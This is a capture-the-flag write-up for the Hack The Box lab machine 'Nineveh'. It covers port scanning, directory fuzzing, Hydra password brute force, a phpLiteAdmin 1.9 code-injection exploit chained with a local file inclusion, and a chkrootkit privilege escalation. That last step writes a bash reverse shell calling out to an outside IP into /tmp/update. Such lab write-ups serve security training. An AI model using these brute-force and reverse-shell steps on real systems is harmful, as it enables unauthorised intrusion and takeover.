Nineveh
- Linux
- Medium
Recon
- Nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
─❯ sudo nmap -p- -T5 -Pn -sV -sC $target -v Nmap scan report for 10.129.99.169 Host is up (0.045s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Issuer: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2017-07-01T15:03:30 | Not valid after: 2018-07-01T15:03:30 | MD5: d182 94b8 0210 7992 bf01 e802 b26f 8639 |_SHA-1: 2275 b03e 27bd 1226 fdaa 8b0f 6de9 84f0 113b 42c0 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1
HTTP
- We find in the nmap output that ssl cert belongs to
commonName=nineveh.htbso we add it to our/etc/hosts
Port 80
-
Fuzzing the site we find a
departmentdirectory with alogin.phppage:
- In the src of the webpage we find the following comment, we can try to bruteforce creds after:
1<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
Port 443
-
Fuzzing the website on 443 find some directories
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
ffuf -v -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://nineveh.htb/FUZZ -v -c -t 100 ... [Status: 301, Size: 309, Words: 20, Lines: 10] | URL | https://nineveh.htb/db | --> | https://nineveh.htb/db/ * FUZZ: db [Status: 200, Size: 49, Words: 3, Lines: 2] | URL | https://nineveh.htb/ * FUZZ: [Status: 403, Size: 300, Words: 22, Lines: 12] | URL | https://nineveh.htb/server-status * FUZZ: server-status [Status: 301, Size: 319, Words: 20, Lines: 10] | URL | https://nineveh.htb/secure_notes | --> | https://nineveh.htb/secure_notes/ * FUZZ: secure_notes ... -
On the /db/ directory we find the following
- phpLiteAdmin
- Version 1.9
-
In /secure_notes/ we find an image.
-
Download the image and check its metadata:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
╰─❯ exiftool nineveh.png ExifTool Version Number : 12.16 File Name : nineveh.png Directory : . File Size : 2.8 MiB File Modification Date/Time : 2017:07:03 01:50:02+02:00 File Access Date/Time : 2021:02:18 17:47:55+01:00 File Inode Change Date/Time : 2021:02:18 17:47:50+01:00 File Permissions : rw-r--r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 1497 Image Height : 746 Bit Depth : 8 Color Type : RGB Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Significant Bits : 8 8 8 Software : Shutter Warning : [minor] Trailer data after PNG IEND chunk Image Size : 1497x746 Megapixels : 1.1 -
We see a Warning which told us that there is a trailer data. We extract it with
binwalk1 2 3 4 5 6
╰─❯ binwalk nineveh.png DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced 84 0x54 Zlib compressed data, best compression 2881744 0x2BF8D0 POSIX tar archive (GNU) -
Examining the files
That is a private ssh key, but port 22 in the machine is not open so we keep it for now.
-
Shell as www-data
- We try to brute the admin creds with Hydra on the port 80 login.php file
1 2 3 4 5 6 | |
-
Then we log and get redirected to
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt-
After tampering a bit, we find there is a LFI in
notesparameter:
-
But we need to upload a PHP file for example, to get a shell with the LFI as there is no SSH port.
-
-
Coming back into the phpLiteAdmin application, we also bruteforce creds with Hydra finding the password is
password1231 2 3 4 5 6
╰─❯ hydra nineveh.htb -l user -P /usr/share/seclists/Passwords/probable-v2-top12000.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password" ... [DATA] attacking http-post-forms://nineveh.htb:443/db/index.php:password=^PASS^&proc_login=true:Incorrect password [443][http-post-form] host: nineveh.htb login: user password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-18 18:37:37-
Now that we have access to phpLiteAdmin, and we confirmed before the version is 1.9, we can find a reliable exploit for this. To exploit it we do the following:
- Create a new database called test.php
- Create a table into the database called SHELL
- Insert PHP code into this table
-
After doing that, we just need to use the LFI found before to call our php file that will execute commands. So we will URL encode a reverse shell in the request.
-
Privesc
-
After transfering the typical enumeration scripts and so, we use Pspy to inspect processes executing in the machine. And we find Root user is using
chkrootkit:
-
We find an exploit for this program abusing a non quoted execution.
-
Just need to create a file in
/tmp/calledupdatethat will be executed.1echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.58/5555 0>&1' &" > /tmp/update -
Wait for the user root to execute
chkrootkitand we are done.
-